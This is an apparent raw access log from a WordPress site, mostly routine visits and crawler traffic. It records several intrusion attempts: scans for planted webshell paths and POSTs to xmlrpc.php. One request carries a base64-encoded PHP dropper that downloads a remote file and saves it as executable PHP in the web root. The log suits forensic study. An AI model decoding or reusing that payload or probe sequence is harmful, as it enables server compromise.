47.82.11.120 - - [01/Apr/2025:09:32:29 -0400] "GET /wp-content/themes/newspaperly/js/script.js HTTP/1.1" 200 1252 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.10.140 - - [01/Apr/2025:09:32:53 -0400] "GET /wp-content/themes/newspaperly/js/jquery.flexslider.js HTTP/1.1" 200 14398 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.10.16 - - [01/Apr/2025:09:33:14 -0400] "GET /wp-content/themes/newspaperly/js/accessibility.js HTTP/1.1" 200 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.11.45 - - [01/Apr/2025:09:33:38 -0400] "GET /wp-content/themes/newspaperly/js/skip-link-focus-fix.js HTTP/1.1" 200 426 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
163.5.241.3 - - [01/Apr/2025:10:04:40 -0400] "GET / HTTP/1.1" 200 97711 "-" "Python/3.11 aiohttp/3.11.11"
216.244.66.196 - - [01/Apr/2025:10:05:23 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:10:29:43 -0400] "POST /wp-cron.php?doing_wp_cron=1743517783.4551169872283935546875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
91.148.239.130 - - [01/Apr/2025:10:29:41 -0400] "GET /wp-options.php?ekle=111 HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:45 -0400] "GET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.2 HTTP/1.1" 200 19532 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:45 -0400] "GET /wp-content/themes/newspaperly/css/font-awesome.min.css?ver=6.7.2 HTTP/1.1" 200 7949 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:45 -0400] "GET /wp-content/themes/minimalist-newspaper/style.css?ver=6.7.2 HTTP/1.1" 200 12958 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:45 -0400] "GET /wp-content/themes/newspaperly/style.css?ver=6.7.2 HTTP/1.1" 200 13480 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:45 -0400] "GET /wp-content/themes/minimalist-newspaper/style.css?ver=1.0 HTTP/1.1" 200 12958 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:45 -0400] "GET /wp-content/fonts/f655b7d03aab3f5c5bc3dd2b03cf7e20.css?ver=1.0 HTTP/1.1" 200 481 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:46 -0400] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1" 200 35438 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:46 -0400] "GET /wp-content/themes/newspaperly/js/navigation.js?ver=20170823 HTTP/1.1" 200 1179 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:46 -0400] "GET /wp-content/themes/newspaperly/js/skip-link-focus-fix.js?ver=20170823 HTTP/1.1" 200 426 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:46 -0400] "GET /wp-content/themes/newspaperly/js/jquery.flexslider.js?ver=20150423 HTTP/1.1" 200 14398 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:46 -0400] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1" 200 5342 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:46 -0400] "GET /wp-content/themes/newspaperly/js/script.js?ver=20160720 HTTP/1.1" 200 1252 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:47 -0400] "GET /wp-content/themes/newspaperly/js/accessibility.js?ver=20160720 HTTP/1.1" 200 548 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:47 -0400] "GET /wp-content/fonts/poppins/pxiEyp8kv8JHgFVrJJfecg.woff2 HTTP/1.1" 200 7884 "http://sunquicksf.com/wp-content/fonts/f655b7d03aab3f5c5bc3dd2b03cf7e20.css?ver=1.0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:47 -0400] "GET /wp-content/fonts/poppins/pxiByp8kv8JHgFVrLGT9Z1xlFQ.woff2 HTTP/1.1" 200 7748 "http://sunquicksf.com/wp-content/fonts/f655b7d03aab3f5c5bc3dd2b03cf7e20.css?ver=1.0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:47 -0400] "GET /wp-content/fonts/poppins/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2 HTTP/1.1" 200 8000 "http://sunquicksf.com/wp-content/fonts/f655b7d03aab3f5c5bc3dd2b03cf7e20.css?ver=1.0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
85.208.98.23 - - [01/Apr/2025:10:37:26 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
156.249.205.124 - - [01/Apr/2025:10:42:11 -0400] "GET /the-best-site-to-buy-youtube-views/ HTTP/1.1" 200 12510 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:114.0) Gecko/20100101 Firefox/114.0"
91.148.239.130 - - [01/Apr/2025:10:48:41 -0400] "GET /wp-options.php?ekle=111 HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:43 -0400] "GET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.2 HTTP/1.1" 200 5857 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:43 -0400] "GET /wp-content/fonts/poppins/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2 HTTP/1.1" 200 8000 "http://sunquicksf.com/wp-content/fonts/f655b7d03aab3f5c5bc3dd2b03cf7e20.css?ver=1.0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:44 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "http://sunquicksf.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
216.244.66.196 - - [01/Apr/2025:10:50:46 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
124.226.222.66 - - [01/Apr/2025:10:52:22 -0400] "GET / HTTP/1.1" 200 97711 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.220.101.81 - - [01/Apr/2025:11:02:52 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "https://www.google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:11:20:33 -0400] "POST /wp-cron.php?doing_wp_cron=1743520831.9216930866241455078125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
91.148.239.130 - - [01/Apr/2025:11:20:29 -0400] "GET /wp-includes/pomo/pomo.php?log=sanane&act=upload&file=wordpress.php&data=PD9waHAKaWYgKGlzc2V0KCRfR0VUWyd1J10pKSB7CiAgICAkdXJsID0gJF9HRVRbJ3UnXTsKICAgIGlmIChmaWx0ZXJfdmFyKCR1cmwsIEZJTFRFUl9WQUxJREFURV9VUkwpKSB7CiAgICAgICAgJGZpbGVDb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7CiAgICAgICAgaWYgKCRmaWxlQ29udGVudCAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgJGZpbGVOYW1lID0gYmFzZW5hbWUocGFyc2VfdXJsKCR1cmwsIFBIUF9VUkxfUEFUSCkpOwogICAgICAgICAgICAkZmlsZU5hbWVXaXRob3V0RXh0ID0gcGF0aGluZm8oJGZpbGVOYW1lLCBQQVRISU5GT19GSUxFTkFNRSk7CiAgICAgICAgICAgICRuZXdGaWxlTmFtZSA9ICRmaWxlTmFtZVdpdGhvdXRFeHQgLiAnLnBocCc7CiAgICAgICAgICAgICRzYXZlUGF0aCA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAnLycgLiAkbmV3RmlsZU5hbWU7CiAgICAgICAgICAgIGZpbGVfcHV0X2NvbnRlbnRzKCRzYXZlUGF0aCwgJGZpbGVDb250ZW50KTsKICAgICAgICAgICAgZWNobyAiRG9zeWEga2F5ZGVkaWxkaTogIiAuICRuZXdGaWxlTmFtZTsKICAgICAgICB9IGVsc2UgewogICAgICAgICAgICBlY2hvICJEb3N5YSBpw6dlcmnEn2kgYWzEsW5hbWFkxLEuIjsKICAgICAgICB9CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIkdlw6dlcnNpeiBVUkwuIjsKICAgIH0KfSBlbHNlIHsKICAgIGVjaG8gIlVSTCBiZWxpcnRpbG1lZGkuIjsKfQo/Pgo= HTTP/1.1" 404 9259 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
216.244.66.196 - - [01/Apr/2025:11:36:19 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:11:39:17 -0400] "POST /wp-cron.php?doing_wp_cron=1743521956.9949660301208496093750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
134.122.135.50 - - [01/Apr/2025:11:39:11 -0400] "GET /apps/admin/view/default/layui/css/layui.css HTTP/1.1" 404 9259 "http://sunquicksf.com/apps/admin/view/default/layui/css/layui.css" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
134.122.135.50 - - [01/Apr/2025:11:39:21 -0400] "GET /plus/img/df_dedetitle.gif HTTP/1.1" 404 9259 "http://sunquicksf.com/plus/img/df_dedetitle.gif" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
134.122.135.77 - - [01/Apr/2025:11:41:01 -0400] "GET /apps/admin/view/default/layui/css/layui.css HTTP/1.1" 404 9259 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
134.122.135.77 - - [01/Apr/2025:11:41:01 -0400] "GET /include/ckeditor/images/addon.gif HTTP/1.1" 404 9259 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
134.122.135.77 - - [01/Apr/2025:11:41:01 -0400] "GET /e/data/images/arrow.gif HTTP/1.1" 404 9259 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:11:41:05 -0400] "POST /wp-cron.php?doing_wp_cron=1743522063.5356080532073974609375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
134.122.135.77 - - [01/Apr/2025:11:41:01 -0400] "GET /public/plugins/Ueditor/dialogs/attachment/fileTypeImages/icon_psd.gif HTTP/1.1" 404 9259 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
134.122.133.12 - - [01/Apr/2025:11:45:24 -0400] "GET /xmlrpc.php HTTP/1.1" 200 0 "http://sunquicksf.com" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.54.114.83 - - [01/Apr/2025:11:45:39 -0400] "POST /wp-cron.php?doing_wp_cron=1743522338.4577090740203857421875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
134.122.133.12 - - [01/Apr/2025:11:48:44 -0400] "GET / HTTP/1.1" 200 97711 "http://sunquicksf.com" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html\xa1\xb1)"
134.122.133.12 - - [01/Apr/2025:11:50:36 -0400] "GET /zb_system/image/common/user_1.png HTTP/1.1" 404 9259 "http://sunquicksf.com" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp\xa1\xb1)"
198.54.114.83 - - [01/Apr/2025:11:50:43 -0400] "POST /wp-cron.php?doing_wp_cron=1743522641.6058280467987060546875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
134.122.133.12 - - [01/Apr/2025:11:50:45 -0400] "GET /zb_users/avatar/0.png HTTP/1.1" 404 9259 "http://sunquicksf.com" "Mozilla/5.0 (compatible; iaskspider/1.0; MSIE 6.0)"
134.122.133.12 - - [01/Apr/2025:11:50:49 -0400] "GET /include/ckeditor/images/addon.gif HTTP/1.1" 404 9259 "http://sunquicksf.com" "msnbot/1.0 (+http://search.msn.com/msnbot.htm\xa1\xb1)"
134.122.133.12 - - [01/Apr/2025:11:50:51 -0400] "GET /images/loadinglit.gif HTTP/1.1" 404 9259 "http://sunquicksf.com" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp\xa1\xb1)"
198.54.114.83 - - [01/Apr/2025:11:51:45 -0400] "POST /wp-cron.php?doing_wp_cron=1743522705.1417620182037353515625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
134.122.133.12 - - [01/Apr/2025:11:51:44 -0400] "GET /public/static/common/images/file.png HTTP/1.1" 404 9259 "http://sunquicksf.com" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html\xa1\xb1)"
134.122.133.12 - - [01/Apr/2025:11:51:47 -0400] "GET /public/static/admin/images/ok.png HTTP/1.1" 404 9259 "http://sunquicksf.com" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp\xa1\xb1)"
192.227.205.118 - - [01/Apr/2025:11:58:56 -0400] "GET /ally-bank-customer-service/ HTTP/1.1" 200 12590 "http://sunquicksf.com/ally-bank-customer-service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:12:14:25 -0400] "POST /wp-cron.php?doing_wp_cron=1743524065.3212690353393554687500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
46.250.169.198 - - [01/Apr/2025:12:14:22 -0400] "GET /innovatives-design-fur-jeden-raum HTTP/1.1" 404 9259 "http://sunquicksf.com/innovatives-design-fur-jeden-raum" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
216.244.66.196 - - [01/Apr/2025:12:21:14 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:12:25:59 -0400] "POST /wp-cron.php?doing_wp_cron=1743524759.1253819465637207031250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
162.214.124.144 - - [01/Apr/2025:12:25:53 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0"
208.85.92.157 - - [01/Apr/2025:12:28:15 -0400] "GET / HTTP/1.1" 200 97711 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
212.102.57.166 - - [01/Apr/2025:12:34:09 -0400] "GET / HTTP/1.1" 200 97711 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:114.0) Gecko/20100101 Firefox/114.0"
198.54.114.83 - - [01/Apr/2025:12:34:13 -0400] "POST /wp-cron.php?doing_wp_cron=1743525252.3762629032135009765625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
212.102.57.166 - - [01/Apr/2025:12:34:11 -0400] "GET /'%20+%20item.url%20+%20' HTTP/1.1" 301 0 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:114.0) Gecko/20100101 Firefox/114.0"
212.102.57.166 - - [01/Apr/2025:12:34:13 -0400] "GET /%20+%20item.url%20+%20 HTTP/1.1" 301 0 "http://sunquicksf.com/'%20+%20item.url%20+%20'" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:114.0) Gecko/20100101 Firefox/114.0"
212.102.57.166 - - [01/Apr/2025:12:34:14 -0400] "GET /%20+%20item.url%20+ HTTP/1.1" 404 9259 "http://sunquicksf.com/%20+%20item.url%20+%20" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:114.0) Gecko/20100101 Firefox/114.0"
45.128.38.94 - - [01/Apr/2025:12:38:52 -0400] "GET /ally-bank-customer-service/ HTTP/1.1" 200 12590 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
185.7.214.130 - - [01/Apr/2025:12:43:37 -0400] "GET / HTTP/1.1" 200 97711 "http://sunquicksf.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
185.108.106.250 - - [01/Apr/2025:12:44:18 -0400] "GET /ally-bank-customer-service/ HTTP/1.1" 200 12590 "http://sunquicksf.com/ally-bank-customer-service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
198.54.114.83 - - [01/Apr/2025:12:44:20 -0400] "POST /wp-cron.php?doing_wp_cron=1743525860.3898570537567138671875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
185.108.106.250 - - [01/Apr/2025:12:44:18 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://sunquicksf.com/ally-bank-customer-service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
85.208.98.23 - - [01/Apr/2025:12:47:36 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
198.54.114.83 - - [01/Apr/2025:12:50:32 -0400] "POST /wp-cron.php?doing_wp_cron=1743526231.9635701179504394531250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
216.244.66.196 - - [01/Apr/2025:12:50:31 -0400] "GET /nusa-penida-tour-package/ HTTP/1.1" 200 11858 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:12:54:20 -0400] "POST /wp-cron.php?doing_wp_cron=1743526460.5218329429626464843750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
50.6.155.60 - - [01/Apr/2025:12:54:17 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0"
198.54.114.83 - - [01/Apr/2025:12:57:14 -0400] "POST /wp-cron.php?doing_wp_cron=1743526634.1554911136627197265625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
13.229.78.155 - - [01/Apr/2025:12:57:13 -0400] "GET /wp-includes/ID3/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:14 -0400] "GET /wp-includes/ID3/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:15 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:16 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [01/Apr/2025:12:57:30 -0400] "POST /wp-cron.php?doing_wp_cron=1743526650.0560939311981201171875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
13.229.78.155 - - [01/Apr/2025:12:57:29 -0400] "GET /wp-includes/IXR/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:31 -0400] "GET /wp-includes/IXR/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:42 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:42 -0400] "GET /wp-admin/images/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:44 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:46 -0400] "GET /wp-content/plugins/admin.php HTTP/1.1" 404 9259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:48 -0400] "GET /xmlrpc.php HTTP/1.1" 405 60 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:51 -0400] "GET /wp-admin.php HTTP/1.1" 404 9259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:52 -0400] "GET /wp-content/plugins/Core-Econ/upH.php HTTP/1.1" 404 9259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:54 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 9259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:55 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 9259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:12:57:57 -0400] "GET /wp-content/plugins/shell/noimg.php HTTP/1.1" 404 9258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
